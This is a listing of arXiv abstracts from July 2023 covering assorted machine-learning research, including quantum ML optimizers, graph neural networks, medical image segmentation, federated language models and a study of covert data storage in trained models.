    Quantum-enhanced data science, also known as quantum machine learning (QML), is of growing interest as an application of near-term quantum computers. Variational QML algorithms have the potential to solve practical problems on real hardware, particularly when involving quantum data. However, training these algorithms can be challenging and calls for tailored optimization procedures. Specifically, QML applications can require a large shot-count overhead due to the large datasets involved. In this work, we advocate for simultaneous random sampling over both the dataset as well as the measurement operators that define the loss function. We consider a highly general loss function that encompasses many QML applications, and we show how to construct an unbiased estimator of its gradient. This allows us to propose a shot-frugal gradient descent optimizer called Refoqus (REsource Frugal Optimizer for QUantum Stochastic gradient descent). Our numerics indicate that Refoqus can save several orders of magnitude in shot cost, even relative to optimizers that sample over measurement operators alone.
    Reduced Kernel Dictionary Learning. (arXiv:2307.08798v1 [eess.SP])
    In this paper we present new algorithms for training reduced-size nonlinear representations in the Kernel Dictionary Learning (KDL) problem. Standard KDL has the drawback of a large size of the kernel matrix when the data set is large. There are several ways of reducing the kernel size, notably Nystr\"om sampling. We propose here a method more in the spirit of dictionary learning, where the kernel vectors are obtained with a trained sparse representation of the input signals. Moreover, we optimize directly the kernel vectors in the KDL process, using gradient descent steps. We show with three data sets that our algorithms are able to provide better representations, despite using a small number of kernel vectors, and also decrease the execution time with respect to KDL.
    Multi-Modal Discussion Transformer: Integrating Text, Images and Graph Transformers to Detect Hate Speech on Social Media. (arXiv:2307.09312v1 [cs.CL])
    We present the Multi-Modal Discussion Transformer (mDT), a novel multi-modal graph-based transformer model for detecting hate speech in online social networks. In contrast to traditional text-only methods, our approach to labelling a comment as hate speech centers around the holistic analysis of text and images. This is done by leveraging graph transformers to capture the contextual relationships in the entire discussion that surrounds a comment, with interwoven fusion layers to combine text and image embeddings instead of processing different modalities separately. We compare the performance of our model to baselines that only process text; we also conduct extensive ablation studies. We conclude with future work for multimodal solutions to deliver social value in online contexts, arguing that capturing a holistic view of a conversation greatly advances the effort to detect anti-social behavior.
    Forecasting the steam mass flow in a powerplant using the parallel hybrid network. (arXiv:2307.09483v1 [cs.LG])
    Efficient and sustainable power generation is a crucial concern in the energy sector. In particular, thermal power plants grapple with accurately predicting steam mass flow, which is crucial for operational efficiency and cost reduction. In this study, we use a parallel hybrid neural network architecture that combines a parametrized quantum circuit and a conventional feed-forward neural network specifically designed for time-series prediction in industrial settings to enhance predictions of steam mass flow 15 minutes into the future. Our results show that the parallel hybrid model outperforms standalone classical and quantum models, achieving more than 5.7 and 4.9 times lower mean squared error (MSE) loss on the test set after training compared to pure classical and pure quantum networks, respectively. Furthermore, the hybrid model demonstrates smaller relative errors between the ground truth and the model predictions on the test set, up to 2 times better than the pure classical model. These findings contribute to the broader scientific understanding of how integrating quantum and classical machine learning techniques can be applied to real-world challenges faced by the energy sector, ultimately leading to optimized power plant operations.
    Implicit Anatomical Rendering for Medical Image Segmentation with Stochastic Experts. (arXiv:2304.03209v2 [cs.CV] UPDATED)
    Integrating high-level semantically correlated contents and low-level anatomical features is of central importance in medical image segmentation. Towards this end, recent deep learning-based medical segmentation methods have shown great promise in better modeling such information. However, convolution operators for medical segmentation typically operate on regular grids, which inherently blur the high-frequency regions, i.e., boundary regions. In this work, we propose MORSE, a generic implicit neural rendering framework designed at an anatomical level to assist learning in medical image segmentation. Our method is motivated by the fact that implicit neural representation has been shown to be more effective in fitting complex signals and solving computer graphics problems than discrete grid-based representation. The core of our approach is to formulate medical image segmentation as a rendering problem in an end-to-end manner. Specifically, we continuously align the coarse segmentation prediction with the ambiguous coordinate-based point representations and aggregate these features to adaptively refine the boundary region. To parallelly optimize multi-scale pixel-level features, we leverage the idea from Mixture-of-Expert (MoE) to design and train our MORSE with a stochastic gating mechanism. Our experiments demonstrate that MORSE can work well with different medical segmentation backbones, consistently achieving competitive performance improvements in both 2D and 3D supervised medical segmentation methods. We also theoretically analyze the superiority of MORSE.
    Globally solving the Gromov-Wasserstein problem for point clouds in low dimensional Euclidean spaces. (arXiv:2307.09057v1 [math.OC])
    This paper presents a framework for computing the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, where the discrepancy is the squared Euclidean norm. The Gromov-Wasserstein problem is a generalization of the optimal transport problem that finds the assignment between two sets preserving pairwise distances as much as possible. This can be used to quantify the similarity between two formations or shapes, a common problem in AI and machine learning. The problem can be formulated as a Quadratic Assignment Problem (QAP), which is in general computationally intractable even for small problems. Our framework addresses this challenge by reformulating the QAP as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank. The method scales well with the number of points, and it can be used to find the global solution for large-scale problems with thousands of points. We compare the computational complexity of our approach with state-of-the-art methods on synthetic problems and apply it to a near-symmetrical problem which is of particular interest in computational biology.
    Variational Monte Carlo on a Budget -- Fine-tuning pre-trained Neural Wavefunctions. (arXiv:2307.09337v1 [physics.chem-ph])
    Obtaining accurate solutions to the Schr\"odinger equation is the key challenge in computational quantum chemistry. Deep-learning-based Variational Monte Carlo (DL-VMC) has recently outperformed conventional approaches in terms of accuracy, but only at large computational cost. Whereas in many domains models are trained once and subsequently applied for inference, accurate DL-VMC so far requires a full optimization for every new problem instance, consuming thousands of GPUhs even for small molecules. We instead propose a DL-VMC model which has been pre-trained using self-supervised wavefunction optimization on a large and chemically diverse set of molecules. Applying this model to new molecules without any optimization, yields wavefunctions and absolute energies that outperform established methods such as CCSD(T)-2Z. To obtain accurate relative energies, only few fine-tuning steps of this base model are required. We accomplish this with a fully end-to-end machine-learned model, consisting of an improved geometry embedding architecture and an existing SE(3)-equivariant model to represent molecular orbitals. Combining this architecture with continuous sampling of geometries, we improve zero-shot accuracy by two orders of magnitude compared to the state of the art. We extensively evaluate the accuracy, scalability and limitations of our base model on a wide variety of test systems.  ( 2 min )
    Learning Dynamic Attribute-factored World Models for Efficient Multi-object Reinforcement Learning. (arXiv:2307.09205v1 [cs.LG])
    In many reinforcement learning tasks, the agent has to learn to interact with many objects of different types and generalize to unseen combinations and numbers of objects. Often a task is a composition of previously learned tasks (e.g. block stacking). These are examples of compositional generalization, in which we compose object-centric representations to solve complex tasks. Recent works have shown the benefits of object-factored representations and hierarchical abstractions for improving sample efficiency in these settings. On the other hand, these methods do not fully exploit the benefits of factorization in terms of object attributes. In this paper, we address this opportunity and introduce the Dynamic Attribute FacTored RL (DAFT-RL) framework. In DAFT-RL, we leverage object-centric representation learning to extract objects from visual inputs. We learn to classify them in classes and infer their latent parameters. For each class of object, we learn a class template graph that describes how the dynamics and reward of an object of this class factorize according to its attributes. We also learn an interaction pattern graph that describes how objects of different classes interact with each other at the attribute level. Through these graphs and a dynamic interaction graph that models the interactions between objects, we can learn a policy that can then be directly applied in a new environment by just estimating the interactions and latent parameters. We evaluate DAFT-RL in three benchmark datasets and show our framework outperforms the state-of-the-art in generalizing across unseen objects with varying attributes and latent parameters, as well as in the composition of previously learned tasks.  ( 3 min )
    A Comprehensive Survey of Forgetting in Deep Learning Beyond Continual Learning. (arXiv:2307.09218v1 [cs.LG])
    Forgetting refers to the loss or deterioration of previously acquired information or knowledge. While the existing surveys on forgetting have primarily focused on continual learning, forgetting is a prevalent phenomenon observed in various other research domains within deep learning. Forgetting manifests in research fields such as generative models due to generator shifts, and federated learning due to heterogeneous data distributions across clients. Addressing forgetting encompasses several challenges, including balancing the retention of old task knowledge with fast learning of new tasks, managing task interference with conflicting goals, and preventing privacy leakage, etc. Moreover, most existing surveys on continual learning implicitly assume that forgetting is always harmful. In contrast, our survey argues that forgetting is a double-edged sword and can be beneficial and desirable in certain cases, such as privacy-preserving scenarios. By exploring forgetting in a broader context, we aim to present a more nuanced understanding of this phenomenon and highlight its potential advantages. Through this comprehensive survey, we aspire to uncover potential solutions by drawing upon ideas and approaches from various fields that have dealt with forgetting. By examining forgetting beyond its conventional boundaries, in future work, we hope to encourage the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications. A comprehensive list of papers about forgetting in various research fields is available at \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}.  ( 3 min )
    A Federated learning model for Electric Energy management using Blockchain Technology. (arXiv:2307.09080v1 [cs.LG])
    Energy shortfall and electricity load shedding are the main problems for developing countries. The main causes are lack of management in the energy sector and the use of non-renewable energy sources. The improved energy management and use of renewable sources can be significant to resolve energy crisis. It is necessary to increase the use of renewable energy sources (RESs) to meet the increasing energy demand due to high prices of fossil-fuel based energy. Federated learning (FL) is the most emerging technique in the field of artificial intelligence. Federated learning helps to generate global model at server side by ensemble locally trained models at remote edges sites while preserving data privacy. The global model used to predict energy demand to satisfy the needs of consumers. In this article, we have proposed Blockchain based safe distributed ledger technology for transaction of data between prosumer and consumer to ensure their transparency, traceability and security. Furthermore, we have also proposed a Federated learning model to forecast the energy requirements of consumer and prosumer. Moreover, Blockchain has been used to store excess energy data from prosumer for better management of energy between prosumer and grid. Lastly, the experiment results revealed that renewable energy sources have produced better and comparable results to other non-renewable energy resources.  ( 2 min )
    DeepMem: ML Models as storage channels and their (mis-)applications. (arXiv:2307.08811v1 [cs.LG])
    Machine learning (ML) models are overparameterized to support generality and avoid overfitting. Prior works have shown that these additional parameters can be used for both malicious (e.g., hiding a model covertly within a trained model) and beneficial purposes (e.g., watermarking a model). In this paper, we propose a novel information theoretic perspective of the problem; we consider the ML model as a storage channel with a capacity that increases with overparameterization. Specifically, we consider a sender that embeds arbitrary information in the model at training time, which can be extracted by a receiver with a black-box access to the deployed model. We derive an upper bound on the capacity of the channel based on the number of available parameters. We then explore black-box write and read primitives that allow the attacker to: (i) store data in an optimized way within the model by augmenting the training data at the transmitter side, and (ii) to read it by querying the model after it is deployed. We also analyze the detectability of the writing primitive and consider a new version of the problem which takes information storage covertness into account. Specifically, to obtain storage covertness, we introduce a new constraint such that the data augmentation used for the write primitives minimizes the distribution shift with the initial (baseline task) distribution. This constraint introduces a level of "interference" with the initial task, thereby limiting the channel's effective capacity. Therefore, we develop optimizations to improve the capacity in this case, including a novel ML-specific substitution based error correction protocol. We believe that the proposed modeling of the problem offers new tools to better understand and mitigate potential vulnerabilities of ML, especially in the context of increasingly large models.  ( 3 min )
    Towards Trustworthy Dataset Distillation. (arXiv:2307.09165v1 [cs.LG])
    Efficiency and trustworthiness are two eternal pursuits when applying deep learning in real-world applications. With regard to efficiency, dataset distillation (DD) endeavors to reduce training costs by distilling the large dataset into a tiny synthetic dataset. However, existing methods merely concentrate on in-distribution (InD) classification in a closed-world setting, disregarding out-of-distribution (OOD) samples. On the other hand, OOD detection aims to enhance models' trustworthiness, which is always inefficiently achieved in full-data settings. For the first time, we simultaneously consider both issues and propose a novel paradigm called Trustworthy Dataset Distillation (TrustDD). By distilling both InD samples and outliers, the condensed datasets are capable to train models competent in both InD classification and OOD detection. To alleviate the requirement of real outlier data and make OOD detection more practical, we further propose to corrupt InD samples to generate pseudo-outliers and introduce Pseudo-Outlier Exposure (POE). Comprehensive experiments on various settings demonstrate the effectiveness of TrustDD, and the proposed POE surpasses state-of-the-art method Outlier Exposure (OE). Compared with the preceding DD, TrustDD is more trustworthy and applicable to real open-world scenarios. Our code will be publicly available.  ( 2 min )
    qecGPT: decoding Quantum Error-correcting Codes with Generative Pre-trained Transformers. (arXiv:2307.09025v1 [quant-ph])
    We propose a general framework for decoding quantum error-correcting codes with generative modeling. The model utilizes autoregressive neural networks, specifically Transformers, to learn the joint probability of logical operators and syndromes. This training is in an unsupervised way, without the need for labeled training data, and is thus referred to as pre-training. After the pre-training, the model can efficiently compute the likelihood of logical operators for any given syndrome, using maximum likelihood decoding. It can directly generate the most-likely logical operators with computational complexity $\mathcal O(2k)$ in the number of logical qubits $k$, which is significantly better than the conventional maximum likelihood decoding algorithms that require $\mathcal O(4^k)$ computation. Based on the pre-trained model, we further propose refinement to achieve more accurately the likelihood of logical operators for a given syndrome by directly sampling the stabilizer operators. We perform numerical experiments on stabilizer codes with small code distances, using both depolarizing error models and error models with correlated noise. The results show that our approach provides significantly better decoding accuracy than the minimum weight perfect matching and belief-propagation-based algorithms. Our framework is general and can be applied to any error model and quantum codes with different topologies such as surface codes and quantum LDPC codes. Furthermore, it leverages the parallelization capabilities of GPUs, enabling simultaneous decoding of a large number of syndromes. Our approach sheds light on the efficient and accurate decoding of quantum error-correcting codes using generative artificial intelligence and modern computational power.  ( 3 min )
    U-shaped Transformer: Retain High Frequency Context in Time Series Analysis. (arXiv:2307.09019v1 [cs.LG])
    Time series prediction plays a crucial role in various industrial fields. In recent years, neural networks with a transformer backbone have achieved remarkable success in many domains, including computer vision and NLP. In time series analysis domain, some studies have suggested that even the simplest MLP networks outperform advanced transformer-based networks on time series forecast tasks. However, we believe these findings indicate there to be low-rank properties in time series sequences. In this paper, we consider the low-pass characteristics of transformers and try to incorporate the advantages of MLP. We adopt skip-layer connections inspired by Unet into traditional transformer backbone, thus preserving high-frequency context from input to output, namely U-shaped Transformer. We introduce patch merge and split operation to extract features with different scales and use larger datasets to fully make use of the transformer backbone. Our experiments demonstrate that the model performs at an advanced level across multiple datasets with relatively low cost.  ( 2 min )
    Towards Automated Design of Riboswitches. (arXiv:2307.08801v1 [cs.LG])
    Experimental screening and selection pipelines for the discovery of novel riboswitches are expensive, time-consuming, and inefficient. Using computational methods to reduce the number of candidates for the screen could drastically decrease these costs. However, existing computational approaches do not fully satisfy all requirements for the design of such initial screening libraries. In this work, we present a new method, libLEARNA, capable of providing RNA focus libraries of diverse variable-length qualified candidates. Our novel structure-based design approach considers global properties as well as desired sequence and structure features. We demonstrate the benefits of our method by designing theophylline riboswitch libraries, following a previously published protocol, and yielding 30% more unique high-quality candidates.  ( 2 min )
    Meta-Value Learning: a General Framework for Learning with Learning Awareness. (arXiv:2307.08863v1 [cs.LG])
    Gradient-based learning in multi-agent systems is difficult because the gradient derives from a first-order model which does not account for the interaction between agents' learning processes. LOLA (arXiv:1709.04326) accounts for this by differentiating through one step of optimization. We extend the ideas of LOLA and develop a fully-general value-based approach to optimization. At the core is a function we call the meta-value, which at each point in joint-policy space gives for each agent a discounted sum of its objective over future optimization steps. We argue that the gradient of the meta-value gives a more reliable improvement direction than the gradient of the original objective, because the meta-value derives from empirical observations of the effects of optimization. We show how the meta-value can be approximated by training a neural network to minimize TD error along optimization trajectories in which agents follow the gradient of the meta-value. We analyze the behavior of our method on the Logistic Game and on the Iterated Prisoner's Dilemma.  ( 2 min )
    Alioth: A Machine Learning Based Interference-Aware Performance Monitor for Multi-Tenancy Applications in Public Cloud. (arXiv:2307.08949v1 [cs.DC])
    Multi-tenancy in public clouds may lead to co-location interference on shared resources, which possibly results in performance degradation of cloud applications. Cloud providers want to know when such events happen and how serious the degradation is, to perform interference-aware migrations and alleviate the problem. However, virtual machines (VM) in Infrastructure-as-a-Service public clouds are black-boxes to providers, where application-level performance information cannot be acquired. This makes performance monitoring intensely challenging as cloud providers can only rely on low-level metrics such as CPU usage and hardware counters. We propose a novel machine learning framework, Alioth, to monitor the performance degradation of cloud applications. To feed the data-hungry models, we first elaborate interference generators and conduct comprehensive co-location experiments on a testbed to build Alioth-dataset which reflects the complexity and dynamicity in real-world scenarios. Then we construct Alioth by (1) augmenting features via recovering low-level metrics under no interference using denoising auto-encoders, (2) devising a transfer learning model based on domain adaptation neural network to make models generalize on test cases unseen in offline training, and (3) developing a SHAP explainer to automate feature selection and enhance model interpretability. Experiments show that Alioth achieves an average mean absolute error of 5.29% offline and 10.8% when testing on applications unseen in the training stage, outperforming the baseline methods. Alioth is also robust in signaling quality-of-service violation under dynamicity. Finally, we demonstrate a possible application of Alioth's interpretability, providing insights to benefit the decision-making of cloud operators. The dataset and code of Alioth have been released on GitHub.  ( 3 min )
    NTK-approximating MLP Fusion for Efficient Language Model Fine-tuning. (arXiv:2307.08941v1 [cs.LG])
    Fine-tuning a pre-trained language model (PLM) emerges as the predominant strategy in many natural language processing applications. However, even fine-tuning the PLMs and doing inference are expensive, especially on edge devices with low computing power. Some general approaches (e.g. quantization and distillation) have been widely studied to reduce the compute/memory of PLM fine-tuning, while very few one-shot compression techniques are explored. In this paper, we investigate the neural tangent kernel (NTK)--which reveals the gradient descent dynamics of neural networks--of the multilayer perceptrons (MLP) modules in a PLM and propose to coin a lightweight PLM through NTK-approximating MLP fusion. To achieve this, we reconsider the MLP as a bundle of sub-MLPs, and cluster them into a given number of centroids, which can then be restored as a compressed MLP and surprisingly shown to well approximate the NTK of the original PLM. Extensive experiments of PLM fine-tuning on both natural language understanding (NLU) and generation (NLG) tasks are provided to verify the effectiveness of the proposed method MLP fusion. Our code is available at https://github.com/weitianxin/MLP_Fusion.  ( 2 min )
    Modular Neural Network Approaches for Surgical Image Recognition. (arXiv:2307.08880v1 [cs.CV])
    Deep learning-based applications have seen a lot of success in recent years. Text, audio, image, and video have all been explored with great success using deep learning approaches. The use of convolutional neural networks (CNN) in computer vision, in particular, has yielded reliable results. In order to achieve these results, a large amount of data is required. However, the dataset cannot always be accessible. Moreover, annotating data can be difficult and time-consuming. Self-training is a semi-supervised approach that managed to alleviate this problem and achieve state-of-the-art performances. Theoretical analysis even proved that it may result in a better generalization than a normal classifier. Another problem neural networks can face is the increasing complexity of modern problems, requiring a high computational and storage cost. One way to mitigate this issue, a strategy that has been inspired by human cognition known as modular learning, can be employed. The principle of the approach is to decompose a complex problem into simpler sub-tasks. This approach has several advantages, including faster learning, better generalization, and enables interpretability. In the first part of this paper, we introduce and evaluate different architectures of modular learning for Dorsal Capsulo-Scapholunate Septum (DCSS) instability classification. Our experiments have shown that modular learning improves performances compared to non-modular systems. Moreover, we found that weighted modular, that is to weight the output using the probabilities from the gating module, achieved an almost perfect classification. In the second part, we present our approach for data labeling and segmentation with self-training applied on shoulder arthroscopy images.  ( 3 min )
    The Predicted-Deletion Dynamic Model: Taking Advantage of ML Predictions, for Free. (arXiv:2307.08890v1 [cs.DS])
    The main bottleneck in designing efficient dynamic algorithms is the unknown nature of the update sequence. In particular, there are some problems, like 3-vertex connectivity, planar digraph all pairs shortest paths, and others, where the separation in runtime between the best partially dynamic solutions and the best fully dynamic solutions is polynomial, sometimes even exponential. In this paper, we formulate the predicted-deletion dynamic model, motivated by a recent line of empirical work about predicting edge updates in dynamic graphs. In this model, edges are inserted and deleted online, and when an edge is inserted, it is accompanied by a "prediction" of its deletion time. This models real world settings where services may have access to historical data or other information about an input and can subsequently use such information make predictions about user behavior. The model is also of theoretical interest, as it interpolates between the partially dynamic and fully dynamic settings, and provides a natural extension of the algorithms with predictions paradigm to the dynamic setting. We give a novel framework for this model that "lifts" partially dynamic algorithms into the fully dynamic setting with little overhead. We use our framework to obtain improved efficiency bounds over the state-of-the-art dynamic algorithms for a variety of problems. In particular, we design algorithms that have amortized update time that scales with a partially dynamic algorithm, with high probability, when the predictions are of high quality. On the flip side, our algorithms do no worse than existing fully-dynamic algorithms when the predictions are of low quality. Furthermore, our algorithms exhibit a graceful trade-off between the two cases. Thus, we are able to take advantage of ML predictions asymptotically "for free.''  ( 3 min )
    Classification with Incoherent Kernel Dictionary Learning. (arXiv:2307.08796v1 [cs.LG])
    In this paper we present a new classification method based on Dictionary Learning (DL). The main contribution consists of a kernel version of incoherent DL, derived from its standard linear counterpart. We also propose an improvement of the AK-SVD algorithm concerning the representation update. Our algorithms are tested on several popular databases of classification problems.  ( 2 min )
    A Meta-Learning Based Precoder Optimization Framework for Rate-Splitting Multiple Access. (arXiv:2307.08822v1 [eess.SP])
    In this letter, we propose the use of a meta-learning based precoder optimization framework to directly optimize the Rate-Splitting Multiple Access (RSMA) precoders with partial Channel State Information at the Transmitter (CSIT). By exploiting the overfitting of the compact neural network to maximize the explicit Average Sum-Rate (ASR) expression, we effectively bypass the need for any other training data while minimizing the total running time. Numerical results reveal that the meta-learning based solution achieves similar ASR performance to conventional precoder optimization in medium-scale scenarios, and significantly outperforms sub-optimal low complexity precoder algorithms in the large-scale regime.  ( 2 min )
    Natural Actor-Critic for Robust Reinforcement Learning with Function Approximation. (arXiv:2307.08875v1 [cs.LG])
    We study robust reinforcement learning (RL) with the goal of determining a well-performing policy that is robust against model mismatch between the training simulator and the testing environment. Previous policy-based robust RL algorithms mainly focus on the tabular setting under uncertainty sets that facilitate robust policy evaluation, but are no longer tractable when the number of states scales up. To this end, we propose two novel uncertainty set formulations, one based on double sampling and the other on an integral probability metric. Both make large-scale robust RL tractable even when one only has access to a simulator. We propose a robust natural actor-critic (RNAC) approach that incorporates the new uncertainty sets and employs function approximation. We provide finite-time convergence guarantees for the proposed RNAC algorithm to the optimal robust policy within the function approximation error. Finally, we demonstrate the robust performance of the policy learned by our proposed RNAC approach in multiple MuJoCo environments and a real-world TurtleBot navigation task.  ( 2 min )
    IxDRL: A Novel Explainable Deep Reinforcement Learning Toolkit based on Analyses of Interestingness. (arXiv:2307.08933v1 [cs.AI])
    In recent years, advances in deep learning have resulted in a plethora of successes in the use of reinforcement learning (RL) to solve complex sequential decision tasks with high-dimensional inputs. However, existing systems lack the necessary mechanisms to provide humans with a holistic view of their competence, presenting an impediment to their adoption, particularly in critical applications where the decisions an agent makes can have significant consequences. Yet, existing RL-based systems are essentially competency-unaware in that they lack the necessary interpretation mechanisms to allow human operators to have an insightful, holistic view of their competency. Towards more explainable Deep RL (xDRL), we propose a new framework based on analyses of interestingness. Our tool provides various measures of RL agent competence stemming from interestingness analysis and is applicable to a wide range of RL algorithms, natively supporting the popular RLLib toolkit. We showcase the use of our framework by applying the proposed pipeline in a set of scenarios of varying complexity. We empirically assess the capability of the approach in identifying agent behavior patterns and competency-controlling conditions, and the task elements mostly responsible for an agent's competence, based on global and local analyses of interestingness. Overall, we show that our framework can provide agent designers with insights about RL agent competence, both their capabilities and limitations, enabling more informed decisions about interventions, additional training, and other interactions in collaborative human-machine settings.  ( 3 min )
    Towards the Sparseness of Projection Head in Self-Supervised Learning. (arXiv:2307.08913v1 [cs.LG])
    In recent years, self-supervised learning (SSL) has emerged as a promising approach for extracting valuable representations from unlabeled data. One successful SSL method is contrastive learning, which aims to bring positive examples closer while pushing negative examples apart. Many current contrastive learning approaches utilize a parameterized projection head. Through a combination of empirical analysis and theoretical investigation, we provide insights into the internal mechanisms of the projection head and its relationship with the phenomenon of dimensional collapse. Our findings demonstrate that the projection head enhances the quality of representations by performing contrastive loss in a projected subspace. Therefore, we propose an assumption that only a subset of features is necessary when minimizing the contrastive loss of a mini-batch of data. Theoretical analysis further suggests that a sparse projection head can enhance generalization, leading us to introduce SparseHead - a regularization term that effectively constrains the sparsity of the projection head, and can be seamlessly integrated with any self-supervised learning (SSL) approaches. Our experimental results validate the effectiveness of SparseHead, demonstrating its ability to improve the performance of existing contrastive methods.  ( 2 min )
    regulAS: A Bioinformatics Tool for the Integrative Analysis of Alternative Splicing Regulome using RNA-Seq data. (arXiv:2307.08800v1 [q-bio.GN])
    The regulAS software package is a bioinformatics tool designed to support computational biology researchers in investigating regulatory mechanisms of splicing alterations through integrative analysis of large-scale RNA-Seq data from cancer and healthy human donors, characterized by TCGA and GTEx projects. This technical report provides a comprehensive overview of regulAS, focusing on its core functionality, basic modules, experiment configuration, further extensibility and customisation. The core functionality of regulAS enables the automation of computational experiments, efficient results storage and processing, and streamlined workflow management. Integrated basic modules extend regulAS with features such as RNA-Seq data retrieval from the public multi-omics UCSC Xena data repository, predictive modeling and feature ranking capabilities using the scikit-learn package, and flexible reporting generation for analysing gene expression profiles and relevant modulations of alternative splicing aberrations across tissues and cancer types. Experiment configuration is handled through YAML files with the Hydra and OmegaConf libraries, offering a user-friendly approach. Additionally, regulAS allows for the development and integration of custom modules to handle specialized tasks. In conclusion, regulAS provides an automated solution for alternative splicing and cancer biology studies, enhancing efficiency, reproducibility, and customization of experimental design, while the extensibility of the pipeline enables researchers to further tailor the software package to their specific needs. Source code is available under the MIT license at https://github.com/slipnitskaya/regulAS.  ( 2 min )
    Examining the Effects of Degree Distribution and Homophily in Graph Learning Models. (arXiv:2307.08881v1 [cs.SI])
    Despite a surge in interest in GNN development, homogeneity in benchmarking datasets still presents a fundamental issue to GNN research. GraphWorld is a recent solution which uses the Stochastic Block Model (SBM) to generate diverse populations of synthetic graphs for benchmarking any GNN task. Despite its success, the SBM imposed fundamental limitations on the kinds of graph structure GraphWorld could create. In this work we examine how two additional synthetic graph generators can improve GraphWorld's evaluation; LFR, a well-established model in the graph clustering literature and CABAM, a recent adaptation of the Barabasi-Albert model tailored for GNN benchmarking. By integrating these generators, we significantly expand the coverage of graph space within the GraphWorld framework while preserving key graph properties observed in real-world networks. To demonstrate their effectiveness, we generate 300,000 graphs to benchmark 11 GNN models on a node classification task. We find GNN performance variations in response to homophily, degree distribution and feature signal. Based on these findings, we classify models by their sensitivity to the new generators under these properties. Additionally, we release the extensions made to GraphWorld on the GitHub repository, offering further evaluation of GNN performance on new graphs.  ( 2 min )
    Sharpness-Aware Graph Collaborative Filtering. (arXiv:2307.08910v1 [cs.LG])
    Graph Neural Networks (GNNs) have achieved impressive performance in collaborative filtering. However, GNNs tend to yield inferior performance when the distributions of training and test data are not aligned well. Also, training GNNs requires optimizing non-convex neural networks with an abundance of local and global minima, which may differ widely in their performance at test time. Thus, it is essential to choose the minima carefully. Here we propose an effective training schema, called {gSAM}, under the principle that the \textit{flatter} minima has a better generalization ability than the \textit{sharper} ones. To achieve this goal, gSAM regularizes the flatness of the weight loss landscape by forming a bi-level optimization: the outer problem conducts the standard model training while the inner problem helps the model jump out of the sharp minima. Experimental results show the superiority of our gSAM.  ( 2 min )
    Autoregressive Diffusion Model for Graph Generation. (arXiv:2307.08849v1 [cs.AI])
    Diffusion-based graph generative models have recently obtained promising results for graph generation. However, existing diffusion-based graph generative models are mostly one-shot generative models that apply Gaussian diffusion in the dequantized adjacency matrix space. Such a strategy can suffer from difficulty in model training, slow sampling speed, and incapability of incorporating constraints. We propose an \emph{autoregressive diffusion} model for graph generation. Unlike existing methods, we define a node-absorbing diffusion process that operates directly in the discrete graph space. For forward diffusion, we design a \emph{diffusion ordering network}, which learns a data-dependent node absorbing ordering from graph topology. For reverse generation, we design a \emph{denoising network} that uses the reverse node ordering to efficiently reconstruct the graph by predicting the node type of the new node and its edges with previously denoised nodes at a time. Based on the permutation invariance of graph, we show that the two networks can be jointly trained by optimizing a simple lower bound of data likelihood. Our experiments on six diverse generic graph datasets and two molecule datasets show that our model achieves better or comparable generation performance with previous state-of-the-art, and meanwhile enjoys fast generation speed.  ( 2 min )
    Latent Space Representations of Neural Algorithmic Reasoners. (arXiv:2307.08874v1 [cs.LG])
    Neural Algorithmic Reasoning (NAR) is a research area focused on designing neural architectures that can reliably capture classical computation, usually by learning to execute algorithms. A typical approach is to rely on Graph Neural Network (GNN) architectures, which encode inputs in high-dimensional latent spaces that are repeatedly transformed during the execution of the algorithm. In this work we perform a detailed analysis of the structure of the latent space induced by the GNN when executing algorithms. We identify two possible failure modes: (i) loss of resolution, making it hard to distinguish similar values; (ii) inability to deal with values outside the range observed during training. We propose to solve the first issue by relying on a softmax aggregator, and propose to decay the latent space in order to deal with out-of-range values. We show that these changes lead to improvements on the majority of algorithms in the standard CLRS-30 benchmark when using the state-of-the-art Triplet-GMPNN processor. Our code is available at \href{https://github.com/mirjanic/nar-latent-spaces}{https://github.com/mirjanic/nar-latent-spaces}.  ( 2 min )
    Federated Large Language Model: A Position Paper. (arXiv:2307.08925v1 [cs.LG])
    Large scale language models (LLM) have received significant attention and found diverse applications across various domains, but their development encounters challenges in real-world scenarios. These challenges arise due to the scarcity of public domain data availability and the need to maintain privacy with respect to private domain data. To address these issues, federated learning (FL) has emerged as a promising technology that enables collaborative training of shared models while preserving decentralized data. We propose the concept of federated LLM, which comprises three key components, i.e., federated LLM pre-training, federated LLM fine-tuning, and federated LLM prompt engineering. For each component, we discuss its advantage over traditional LLM training methods and propose specific engineering strategies for implementation. Furthermore, we explore the novel challenges introduced by the integration of FL and LLM. We analyze existing solutions and identify potential obstacles faced by these solutions within the context of federated LLM.  ( 2 min )
    Disentangling Node Attributes from Graph Topology for Improved Generalizability in Link Prediction. (arXiv:2307.08877v1 [cs.LG])
    Link prediction is a crucial task in graph machine learning with diverse applications. We explore the interplay between node attributes and graph topology and demonstrate that incorporating pre-trained node attributes improves the generalization power of link prediction models. Our proposed method, UPNA (Unsupervised Pre-training of Node Attributes), solves the inductive link prediction problem by learning a function that takes a pair of node attributes and predicts the probability of an edge, as opposed to Graph Neural Networks (GNN), which can be prone to topological shortcuts in graphs with power-law degree distribution. In this manner, UPNA learns a significant part of the latent graph generation mechanism since the learned function can be used to add incoming nodes to a growing graph. By leveraging pre-trained node attributes, we overcome observational bias and make meaningful predictions about unobserved nodes, surpassing state-of-the-art performance (3X to 34X improvement on benchmark datasets). UPNA can be applied to various pairwise learning tasks and integrated with existing link prediction models to enhance their generalizability and bolster graph generative models.  ( 2 min )
    Multi-stage Neural Networks: Function Approximator of Machine Precision. (arXiv:2307.08934v1 [cs.LG])
    Deep learning techniques are increasingly applied to scientific problems, where the precision of networks is crucial. Despite being deemed as universal function approximators, neural networks, in practice, struggle to reduce the prediction errors below $O(10^{-5})$ even with large network size and extended training iterations. To address this issue, we developed the multi-stage neural networks that divides the training process into different stages, with each stage using a new network that is optimized to fit the residue from the previous stage. Across successive stages, the residue magnitudes decreases substantially and follows an inverse power-law relationship with the residue frequencies. The multi-stage neural networks effectively mitigate the spectral biases associated with regular neural networks, enabling them to capture the high frequency feature of target functions. We demonstrate that the prediction error from the multi-stage training for both regression problems and physics-informed neural networks can nearly reach the machine-precision $O(10^{-16})$ of double-floating point within a finite number of iterations. Such levels of accuracy are rarely attainable using single neural networks alone.  ( 2 min )
    A mixed policy to improve performance of language models on math problems. (arXiv:2307.08767v1 [cs.CL])
